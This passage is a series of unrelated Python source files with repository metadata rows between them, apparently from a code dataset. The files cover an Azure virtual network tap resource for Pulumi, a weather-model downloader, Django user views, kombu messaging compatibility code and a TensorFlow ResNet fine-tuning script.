destination_network_interface_ip_configuration: Optional[pulumi.Input[pulumi.InputType['NetworkInterfaceIPConfigurationArgs']]] = None,
destination_port: Optional[pulumi.Input[int]] = None,
id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tap_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Virtual Network Tap resource.
API Version: 2020-11-01.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']] destination_load_balancer_front_end_ip_configuration: The reference to the private IP address on the internal Load Balancer that will receive the tap.
:param pulumi.Input[pulumi.InputType['NetworkInterfaceIPConfigurationArgs']] destination_network_interface_ip_configuration: The reference to the private IP Address of the collector nic that will receive the tap.
:param pulumi.Input[int] destination_port: The VXLAN destination port that will receive the tapped traffic.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[str] tap_name: The name of the virtual network tap.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: VirtualNetworkTapInitArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Virtual Network Tap resource.
API Version: 2020-11-01.
:param str resource_name: The name of the resource.
:param VirtualNetworkTapInitArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(VirtualNetworkTapInitArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
destination_load_balancer_front_end_ip_configuration: Optional[pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']]] = None,
destination_network_interface_ip_configuration: Optional[pulumi.Input[pulumi.InputType['NetworkInterfaceIPConfigurationArgs']]] = None,
destination_port: Optional[pulumi.Input[int]] = None,
id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tap_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = VirtualNetworkTapInitArgs.__new__(VirtualNetworkTapInitArgs)
__props__.__dict__["destination_load_balancer_front_end_ip_configuration"] = destination_load_balancer_front_end_ip_configuration
__props__.__dict__["destination_network_interface_ip_configuration"] = destination_network_interface_ip_configuration
__props__.__dict__["destination_port"] = destination_port
__props__.__dict__["id"] = id
__props__.__dict__["location"] = location
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
__props__.__dict__["tap_name"] = tap_name
__props__.__dict__["etag"] = None
__props__.__dict__["name"] = None
__props__.__dict__["network_interface_tap_configurations"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["resource_guid"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-native:network/v20180801:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20181001:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20181101:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20181201:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20190201:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20190401:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20190601:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20190701:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20190801:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20190901:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20191101:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20191201:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20200301:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20200401:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20200501:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20200601:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20200701:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20200801:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20201101:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20210201:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20210301:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20210501:VirtualNetworkTap")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(VirtualNetworkTap, __self__).__init__(
'azure-native:network:VirtualNetworkTap',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'VirtualNetworkTap':
"""
Get an existing VirtualNetworkTap resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = VirtualNetworkTapInitArgs.__new__(VirtualNetworkTapInitArgs)
__props__.__dict__["destination_load_balancer_front_end_ip_configuration"] = None
__props__.__dict__["destination_network_interface_ip_configuration"] = None
__props__.__dict__["destination_port"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["network_interface_tap_configurations"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["resource_guid"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
return VirtualNetworkTap(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="destinationLoadBalancerFrontEndIPConfiguration")
def destination_load_balancer_front_end_ip_configuration(self) -> pulumi.Output[Optional['outputs.FrontendIPConfigurationResponse']]:
"""
The reference to the private IP address on the internal Load Balancer that will receive the tap.
"""
return pulumi.get(self, "destination_load_balancer_front_end_ip_configuration")
@property
@pulumi.getter(name="destinationNetworkInterfaceIPConfiguration")
def destination_network_interface_ip_configuration(self) -> pulumi.Output[Optional['outputs.NetworkInterfaceIPConfigurationResponse']]:
"""
The reference to the private IP Address of the collector nic that will receive the tap.
"""
return pulumi.get(self, "destination_network_interface_ip_configuration")
@property
@pulumi.getter(name="destinationPort")
def destination_port(self) -> pulumi.Output[Optional[int]]:
"""
The VXLAN destination port that will receive the tapped traffic.
"""
return pulumi.get(self, "destination_port")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkInterfaceTapConfigurations")
def network_interface_tap_configurations(self) -> pulumi.Output[Sequence['outputs.NetworkInterfaceTapConfigurationResponse']]:
"""
Specifies the list of resource IDs for the network interface IP configuration that needs to be tapped.
"""
return pulumi.get(self, "network_interface_tap_configurations")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the virtual network tap resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="resourceGuid")
def resource_guid(self) -> pulumi.Output[str]:
"""
The resource GUID property of the virtual network tap resource.
"""
return pulumi.get(self, "resource_guid")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
| [
"[email protected]"
]
| |
708a1faf765b96d7f5a0505c9bf4c02d987ff8ba | 07504838d12c6328da093dce3726e8ed096cecdb | /pylon/resources/properties/highLimDly.py | bc4cf1c574d3d5599664567f174174735af07093 | []
| no_license | lcoppa/fiat-lux | 9caaa7f3105e692a149fdd384ec590676f06bf00 | 7c166bcc08768da67c241078b397570de159e240 | refs/heads/master | 2020-04-04T02:47:19.917668 | 2013-10-10T10:22:51 | 2013-10-10T10:22:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,294 | py | """highLimDly standard property type, originally defined in resource file set
standard 00:00:00:00:00:00:00:00-0."""
# Copyright (C) 2013 Echelon Corporation. All Rights Reserved.
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software" to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# This file is generated from device resource files using an automated
# database to source code conversion process. Grammar and punctuation within
# the embedded documentation may not be correct, as this data is gathered and
# combined from several sources. The machine-generated code may not meet
# compliance with PEP-8 and PEP-257 recommendations at all times.
# Generated at 23-Sep-2013 09:15.
import pylon.resources.datapoints.time_sec
from pylon.resources.standard import standard
class highLimDly(pylon.resources.datapoints.time_sec.time_sec):
"""highLimDly standard property type. High limit delay. The time limit
during normal operation before the alarm air temp high alarm is
recognized."""
def __init__(self):
super().__init__(
)
self._default_bytes = b'\x00\x00'
self._original_name = 'SCPThighLimDly'
self._property_scope, self._property_key = 0, 124
self._definition = standard.add(self)
if __name__ == '__main__':
# unit test code.
item = highLimDly()
pass
| [
"[email protected]"
]
| |
2f8c03f052351b799bfba46a92f2566cc993aedd | 5181d3b3ef8fe301ea2d6b095260e9d327c2fd79 | /scripts/dl/download_hrrr.py | dad9ed84e463252c8a1b7b4fff6d35e96c53d1d1 | []
| no_license | danhreitz/iem | 88113ef9c9c4a2918c9c2abdfd0510d5ca4ec819 | ed490dcd6c2a8359f88cb805ccee8f6707566f57 | refs/heads/master | 2021-01-18T15:27:28.607250 | 2015-08-10T21:33:54 | 2015-08-10T21:33:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,340 | py | """
Since the NOAAPort feed of HRRR data does not have radiation, we should
download this manually from NCEP
Run at 40 AFTER for the previous hour
"""
import urllib2
import sys
import datetime
import os
def fetch(valid):
""" Fetch the radiation data for this timestamp
80:54371554:d=2014101002:ULWRF:top of atmosphere:anl:
81:56146124:d=2014101002:DSWRF:surface:anl:
"""
uri = valid.strftime(("http://www.ftp.ncep.noaa.gov/data/nccf/"
"nonoperational/com/hrrr/prod/hrrr.%Y%m%d/hrrr.t%Hz."
"wrfprsf00.grib2.idx"))
data = urllib2.urlopen(uri, timeout=30)
offsets = []
neednext = False
for line in data:
tokens = line.split(":")
if neednext:
offsets[-1].append(int(tokens[1]))
neednext = False
if tokens[3] in ['ULWRF', 'DSWRF']:
offsets.append([int(tokens[1]), ])
neednext = True
# Save soil temp and water at surface, 10cm and 40cm
if tokens[3] in ['TSOIL', 'SOILW']:
if tokens[4] in ['0-0 m below ground',
'0.01-0.01 m below ground',
'0.04-0.04 m below ground']:
offsets.append([int(tokens[1]), ])
neednext = True
outfn = valid.strftime(("/mesonet/ARCHIVE/data/%Y/%m/%d/model/hrrr/"
"%H/hrrr.t%Hz.3kmf00.grib2"))
outdir = os.path.dirname(outfn)
if not os.path.isdir(outdir):
os.makedirs(outdir, mode=0775) # make sure LDM can then write to dir
output = open(outfn, 'ab', 0664)
req = urllib2.Request(uri[:-4])
if len(offsets) != 8:
print("download_hrrr_rad warning, found %s gribs for %s" % (
len(offsets), valid))
for pr in offsets:
req.headers['Range'] = 'bytes=%s-%s' % (pr[0], pr[1])
f = urllib2.urlopen(req, timeout=30)
output.write(f.read())
output.close()
def main():
""" Go Main Go"""
ts = datetime.datetime.utcnow() - datetime.timedelta(hours=1)
if len(sys.argv) == 5:
ts = datetime.datetime(int(sys.argv[1]), int(sys.argv[2]),
int(sys.argv[3]), int(sys.argv[4]))
fetch(ts)
if __name__ == '__main__':
os.umask(0002)
main()
| [
"[email protected]"
]
| |
3b79ecee53bab652825699f9a829541d12808883 | 53d22468fb1c9e0f4b4710a31fb7ac638549b8a7 | /src/episode_stats.py | 8c746bbebadc8b8367d5a5f0ae15a6bda7162cea | [
"MIT"
]
| permissive | binderwang/drivebot | 768bcfe224d94b931c45c41ced2a1b0067c6417d | a8fb86731c52b7594dd135e8759622c29172b557 | refs/heads/master | 2020-12-14T09:48:59.857490 | 2016-05-03T03:17:58 | 2016-05-03T03:17:58 | 58,269,730 | 1 | 0 | null | 2016-05-07T14:33:18 | 2016-05-07T14:33:17 | null | UTF-8 | Python | false | false | 261 | py | #!/usr/bin/env python
import json
import sys
episode_id = 0
for line in sys.stdin:
episode = json.loads(line)
rewards = [event['reward'] for event in episode]
print "\t".join(map(str, [episode_id, len(episode), sum(rewards)]))
episode_id += 1
| [
"[email protected]"
]
| |
1ed8a791199fb00c45f4eb0ca5c4eb7b0da7e94c | 20db5a27f2a8b2d324085f5e1ec6c46ad7c1e8c3 | /manage.py | c330237e8173667cd9d46db5ee3ead0af6d478a2 | []
| no_license | mortadagzar/djangoMovie | dae326fc83a31e485792b1ee42fa89b7d681049d | e83904c0c1ecc45992eed7516cb483bd2c97590b | refs/heads/master | 2020-04-01T22:32:28.246877 | 2018-10-19T02:41:22 | 2018-10-19T02:41:22 | 153,713,907 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 543 | py | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djangoMovie.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"[email protected]"
]
| |
f6b0c0ebfcfea1688b03ec725be8faebb3cbbbee | 2598f255696842f043372dd68fe4d5fd48d1a41c | /Ofelia/expedient/src/python/expedient/clearinghouse/users/views.py | 5bd342d561ba8106b5c71655fbdfedc0cbb0a6c3 | [
"BSD-3-Clause"
]
| permissive | zanetworker/C-BAS | 8e5442df83626e95d9562497278869ee3c4fad51 | 695c6f72490a02bbb308d44526631dbf426ab900 | refs/heads/master | 2021-01-01T06:55:39.085086 | 2014-08-11T09:37:42 | 2014-08-11T09:37:42 | 22,351,372 | 1 | 0 | null | 2014-08-08T16:15:54 | 2014-07-28T17:28:44 | Python | UTF-8 | Python | false | false | 7,668 | py | '''
Created on Dec 3, 2009
@author: jnaous
'''
from django.shortcuts import get_object_or_404
from django.http import HttpResponseRedirect, HttpResponseNotAllowed
from django.core.urlresolvers import reverse
from expedient.clearinghouse import users
from django.views.generic import create_update, simple
from django.contrib import auth
from expedient.common.permissions.shortcuts import must_have_permission,\
give_permission_to
from registration import views as registration_views
from expedient.clearinghouse.users.forms import FullRegistrationForm
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.auth.views import password_reset
from expedient.clearinghouse.users.forms import LDAPPasswordResetForm
def home(request):
'''show list of users and form for adding users'''
must_have_permission(request.user, User, "can_manage_users")
user_list = auth.models.User.objects.all().order_by('username')
if request.method == "GET":
pwd_form = auth.forms.UserCreationForm()
user_form = users.forms.UserForm()
userprofile_form = users.forms.UserProfileForm()
elif request.method == "POST":
pwd_form = auth.forms.UserCreationForm(request.POST)
user_form = users.forms.UserForm(request.POST)
userprofile_form = users.forms.UserProfileForm(request.POST)
# check that all data is valid
if pwd_form.is_valid() and user_form.is_valid() and userprofile_form.is_valid():
# create the user first
user = pwd_form.save()
# use the user to save the user info
user_form = users.forms.UserForm(request.POST, instance=user)
user = user_form.save()
# now store the user profile
up = users.models.UserProfile(user=user)
userprofile_form = users.forms.UserProfileForm(request.POST, instance=up)
userprofile_form.save()
return HttpResponseRedirect(reverse("users_saved", args=(user.id,)))
else:
return HttpResponseNotAllowed("GET", "POST")
return simple.direct_to_template(
request,
template='expedient/clearinghouse/users/home.html',
extra_context={
'user_list': user_list,
'pwd_form': pwd_form,
'user_form': user_form,
'userprofile_form': userprofile_form,
'breadcrumbs': (
("Home", reverse("home")),
("Manage users", request.path),
)
},
)
def detail(request, user_id=None):
if user_id == None:
user = request.user
else:
user = get_object_or_404(auth.models.User, pk=user_id)
must_have_permission(request.user, user, "can_edit_user")
profile = users.models.UserProfile.get_or_create_profile(user)
if request.method == "GET":
if user_id == None:
pwd_form = users.forms.PasswordChangeFormDisabled(user)
else:
pwd_form = users.forms.AdminPasswordChangeFormDisabled(user)
user_form = users.forms.UserForm(instance=user)
userprofile_form = users.forms.UserProfileForm(instance=profile)
elif request.method == "POST":
if request.POST.get("change_pwd", False):
data = request.POST
else:
data = None
if user_id == None:
pwd_form = users.forms.PasswordChangeFormDisabled(user, data)
else:
pwd_form = users.forms.AdminPasswordChangeFormDisabled(user, data)
user_form = users.forms.UserForm(request.POST, instance=user)
userprofile_form = users.forms.UserProfileForm(request.POST, instance=profile)
if user_form.is_valid() and userprofile_form.is_valid():
user = user_form.save()
userprofile_form = users.forms.UserProfileForm(request.POST, instance=profile)
userprofile_form.save()
if request.POST.get("change_pwd", False) and pwd_form.is_valid():
pwd_form.save()
return HttpResponseRedirect(reverse("users_saved", args=(user.id,)))
elif "change_pwd" not in request.POST:
return HttpResponseRedirect(reverse("users_saved", args=(user.id,)))
else:
return HttpResponseNotAllowed("GET", "POST")
try:
slice_set = user.slice_set.all()
except AttributeError:
slice_set = ()
return simple.direct_to_template(
request,
template='expedient/clearinghouse/users/detail.html',
extra_context={
'curr_user': user,
'slices': slice_set,
'pwd_form': pwd_form,
'user_form': user_form,
'show_owner': True,
'userprofile_form': userprofile_form,
'breadcrumbs': (
("Home", reverse("home")),
("Account for %s" % user.username, reverse("users_detail", args=[user.id])),
)
},
)
def saved(request, user_id):
user = get_object_or_404(auth.models.User, pk=user_id)
print user.id
return simple.direct_to_template(
request,
template='expedient/clearinghouse/users/saved.html',
extra_context={
'curr_user': user,
},
)
def delete(request, user_id):
user = get_object_or_404(auth.models.User, pk=user_id)
must_have_permission(request.user, user, "can_edit_user")
return create_update.delete_object(
request,
auth.models.User,
reverse("users_home"),
user_id,
template_name="expedient/clearinghouse/users/confirm_delete.html",
)
def register(request):
try:
return registration_views.register(
request,
form_class=FullRegistrationForm)
except Exception as e:
print "[ERROR] Exception at 'expedient.clearinghouse.users.views': user '%s' (%s) could not fully register. RegistrationForm module returned: %s" % (request.POST['username'], request.POST['email'], str(e))
return simple.direct_to_template(
request,
template='registration/registration_incomplete.html',
extra_context={
'exception': e,
'root_email': settings.ROOT_EMAIL,
'failed_username': request.POST['username'],
'failed_email': request.POST['email'],
},
)
def activate(request, activation_key):
template_name = 'registration/activate.html'
activation_key = activation_key.lower() # Normalize before trying anything with it.
# Import only here to avoid every time warning 'DeprecationWarning:
# the sha module is deprecated; use the hashlib module instead'
from registration.models import RegistrationProfile
account = RegistrationProfile.objects.activate_user(activation_key)
if account:
give_permission_to(
"can_edit_user", account, account, can_delegate=True)
return simple.direct_to_template(
request,
template=template_name,
extra_context={
'account': account,
'expiration_days': settings.ACCOUNT_ACTIVATION_DAYS,
},
)
def my_password_reset(request):
if request.method == 'GET':
return password_reset(request)
else:
email = request.POST['email']
users = User.objects.filter(email = email)
if len(users) == 1 and users[0].password == '!':
return HttpResponseRedirect(settings.OFREG_URL+settings.OFREG_RESET_PATH)
else:
return password_reset(request, password_reset_form=LDAPPasswordResetForm)
| [
"[email protected]"
]
| |
8d637f9712aa8cd0fa725ea3c7b3285cb522f1da | be5a758c99f05c8ae8c224bf43335154114ee5f6 | /kombu/compat.py | 224f2e33e5d44865c3202047427a7e1c535ba30d | [
"BSD-3-Clause"
]
| permissive | bradjasper/kombu | 160ed1b5651f91a87752df40791d01c91ca1fe16 | 4c9ac1436eb0468508f8b2cf1bda997535e1326d | refs/heads/master | 2021-01-16T00:23:17.928400 | 2010-07-28T17:25:32 | 2010-07-28T17:25:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,431 | py | from itertools import count
from kombu import entity
from kombu import messaging
def iterconsume(connection, consumer, no_ack=False, limit=None):
consumer.consume(no_ack=no_ack)
for iteration in count(0):
if limit and iteration >= limit:
raise StopIteration
yield connection.drain_events()
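# Compat helper: entry_to_binding flattens a dict of legacy queue/exchange options (exchange, exchange_type,
# routing_key, durability, auto_delete, arguments...) into a kombu Exchange wrapped in an entity.Binding.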
def entry_to_binding(queue, **options):
binding_key = options.get("binding_key") or options.get("routing_key")
e_durable = options.get("exchange_durable") or options.get("durable")
e_auto_delete = options.get("exchange_auto_delete") or \
options.get("auto_delete")
q_durable = options.get("queue_durable") or options.get("durable")
q_auto_delete = options.get("queue_auto_delete") or \
options.get("auto_delete")
e_arguments = options.get("exchange_arguments")
q_arguments = options.get("queue_arguments")
b_arguments = options.get("binding_arguments")
exchange = entity.Exchange(options.get("exchange"),
type=options.get("exchange_type"),
delivery_mode=options.get("delivery_mode"),
routing_key=options.get("routing_key"),
durable=e_durable,
auto_delete=e_auto_delete,
arguments=e_arguments)
return entity.Binding(queue,
exchange=exchange,
routing_key=binding_key,
durable=q_durable,
exclusive=options.get("exclusive"),
auto_delete=q_auto_delete,
queue_arguments=q_arguments,
binding_arguments=b_arguments)
class Publisher(messaging.Producer):
exchange = ""
exchange_type = "direct"
routing_key = ""
durable = True
auto_delete = False
_closed = False
def __init__(self, connection, exchange=None, routing_key=None,
exchange_type=None, durable=None, auto_delete=None, **kwargs):
self.connection = connection
self.backend = connection.channel()
self.exchange = exchange or self.exchange
self.exchange_type = exchange_type or self.exchange_type
self.routing_key = routing_key or self.routing_key
if auto_delete is not None:
self.auto_delete = auto_delete
if durable is not None:
self.durable = durable
if not isinstance(self.exchange, entity.Exchange):
self.exchange = entity.Exchange(name=self.exchange,
type=self.exchange_type,
routing_key=self.routing_key,
auto_delete=self.auto_delete,
durable=self.durable)
super(Publisher, self).__init__(self.backend, self.exchange,
**kwargs)
def send(self, *args, **kwargs):
return self.publish(*args, **kwargs)
def close(self):
self.backend.close()
self._closed = True
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
class Consumer(messaging.Consumer):
queue = ""
exchange = ""
routing_key = ""
exchange_type = "direct"
durable = True
exclusive = False
auto_delete = False
exchange_type = "direct"
_closed = False
def __init__(self, connection, queue=None, exchange=None,
routing_key=None, exchange_type=None, durable=None,
exclusive=None, auto_delete=None, **kwargs):
self.connection = connection
self.backend = connection.channel()
if durable is not None:
self.durable = durable
if exclusive is not None:
self.exclusive = exclusive
if auto_delete is not None:
self.auto_delete = auto_delete
self.queue = queue or self.queue
self.exchange = exchange or self.exchange
self.exchange_type = exchange_type or self.exchange_type
self.routing_key = routing_key or self.routing_key
exchange = entity.Exchange(self.exchange,
type=self.exchange_type,
routing_key=self.routing_key,
auto_delete=self.auto_delete,
durable=self.durable)
binding = entity.Binding(self.queue,
exchange=exchange,
routing_key=self.routing_key,
durable=self.durable,
exclusive=self.exclusive,
auto_delete=self.auto_delete)
super(Consumer, self).__init__(self.backend, binding, **kwargs)
def close(self):
self.cancel()
self.backend.close()
self._closed = True
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
def __iter__(self):
return self.iterqueue(infinite=True)
def fetch(self, no_ack=None, enable_callbacks=False):
if no_ack is None:
no_ack = self.no_ack
message = self.bindings[0].get(no_ack)
if message:
if enable_callbacks:
self.receive(message.payload, message)
return message
def process_next(self):
raise NotImplementedError("Use fetch(enable_callbacks=True)")
def discard_all(self, filterfunc=None):
if filterfunc is not None:
raise NotImplementedError(
"discard_all does not implement filters")
return self.purge()
def iterconsume(self, limit=None, no_ack=None):
return iterconsume(self.connection, self, no_ack, limit)
def wait(self, limit=None):
it = self.iterconsume(limit)
return list(it)
def iterqueue(self, limit=None, infinite=False):
for items_since_start in count():
item = self.fetch()
if (not infinite and item is None) or \
(limit and items_since_start >= limit):
raise StopIteration
yield item
class _CSet(messaging.Consumer):
def __init__(self, connection, *args, **kwargs):
self.connection = connection
self.backend = connection.channel()
super(_CSet, self).__init__(self.backend, *args, **kwargs)
def iterconsume(self, limit=None, no_ack=False):
return iterconsume(self.connection, self, no_ack, limit)
def discard_all(self):
return self.purge()
def add_consumer_from_dict(self, queue, **options):
self.bindings.append(entry_to_binding(queue, **options))
def add_consumer(self, consumer):
self.bindings.extend(consumer.bindings)
def close(self):
self.cancel()
self.channel.close()
def ConsumerSet(connection, from_dict=None, consumers=None,
callbacks=None, **kwargs):
bindings = []
if consumers:
for consumer in consumers:
map(bindings.extend, consumer.bindings)
if from_dict:
for queue_name, queue_options in from_dict.items():
bindings.append(entry_to_binding(queue_name, **queue_options))
return _CSet(connection, bindings, **kwargs)
| [
"[email protected]"
]
| |
c3af127904d957a29958033e8898da66cbee1238 | 70ed82598c7ae19dc3de4a3a8400e9767b8a74b0 | /Net/BaseNet/ResNet/fine_tuning_2.py | a5c28f115867e33b9eb23304dfaf71d8d7a0216b | []
| no_license | UpCoder/MedicalImage | f255922b988392cd4c3a90715fb945ee20edb3b4 | 34c11562658e6f362ee7eb53740ba96209a22d45 | refs/heads/master | 2021-01-19T16:59:13.251726 | 2017-12-04T14:55:32 | 2017-12-04T14:55:32 | 101,031,357 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,832 | py | # -*- coding: utf-8 -*-
# Fine-tune on the ROI using the model trained on patches
from resnet import inference_small, loss
import tensorflow as tf
from Config import Config as sub_Config
from Slice.MaxSlice.MaxSlice_Resize import MaxSlice_Resize
from tensorflow.examples.tutorials.mnist import input_data
from Tools import changed_shape, calculate_acc_error, acc_binary_acc
import numpy as np
from Patch.ValData import ValDataSet
from Patch.Config import Config as patch_config
def train(train_data_set, val_data_set, load_model_path, save_model_path):
x = tf.placeholder(
tf.float32,
shape=[
None,
sub_Config.IMAGE_W,
sub_Config.IMAGE_H,
sub_Config.IMAGE_CHANNEL
],
name='input_x'
)
y_ = tf.placeholder(
tf.float32,
shape=[
None,
]
)
tf.summary.histogram(
'label',
y_
)
global_step = tf.Variable(0, trainable=False)
# variable_average = tf.train.ExponentialMovingAverage(
# sub_Config.MOVING_AVERAGE_DECAY,
# global_step
# )
# vaeriable_average_op = variable_average.apply(tf.trainable_variables())
# regularizer = tf.contrib.layers.l2_regularizer(sub_Config.REGULARIZTION_RATE)
is_training = tf.placeholder('bool', [], name='is_training')
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('data_dir', '/tmp/cifar-data',
'where to store the dataset')
tf.app.flags.DEFINE_boolean('use_bn', True, 'use batch normalization. otherwise use biases')
y = inference_small(x, is_training=is_training,
num_classes=sub_Config.OUTPUT_NODE,
use_bias=FLAGS.use_bn,
num_blocks=3)
tf.summary.histogram(
'logits',
tf.argmax(y, 1)
)
loss_ = loss(
logits=y,
labels=tf.cast(y_, np.int32)
)
tf.summary.scalar(
'loss',
loss_
)
train_op = tf.train.GradientDescentOptimizer(
learning_rate=sub_Config.LEARNING_RATE
).minimize(
loss=loss_,
global_step=global_step
)
# with tf.control_dependencies([train_step, vaeriable_average_op]):
# train_op = tf.no_op(name='train')
with tf.variable_scope('accuracy'):
accuracy_tensor = tf.reduce_mean(
tf.cast(
tf.equal(x=tf.argmax(y, 1), y=tf.cast(y_, tf.int64)),
tf.float32
)
)
tf.summary.scalar(
'accuracy',
accuracy_tensor
)
saver = tf.train.Saver()
merge_op = tf.summary.merge_all()
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
if load_model_path:
saver.restore(sess, load_model_path)
writer = tf.summary.FileWriter('./log/fine_tuning/train', tf.get_default_graph())
val_writer = tf.summary.FileWriter('./log/fine_tuning/val', tf.get_default_graph())
for i in range(sub_Config.ITERATOE_NUMBER):
images, labels = train_data_set.get_next_batch(sub_Config.BATCH_SIZE, sub_Config.BATCH_DISTRIBUTION)
images = changed_shape(images, [
len(images),
sub_Config.IMAGE_W,
sub_Config.IMAGE_W,
sub_Config.IMAGE_CHANNEL
])
_, loss_value, accuracy_value, summary, global_step_value = sess.run(
[train_op, loss_, accuracy_tensor, merge_op, global_step],
feed_dict={
x: images,
y_: labels
}
)
writer.add_summary(
summary=summary,
global_step=global_step_value
)
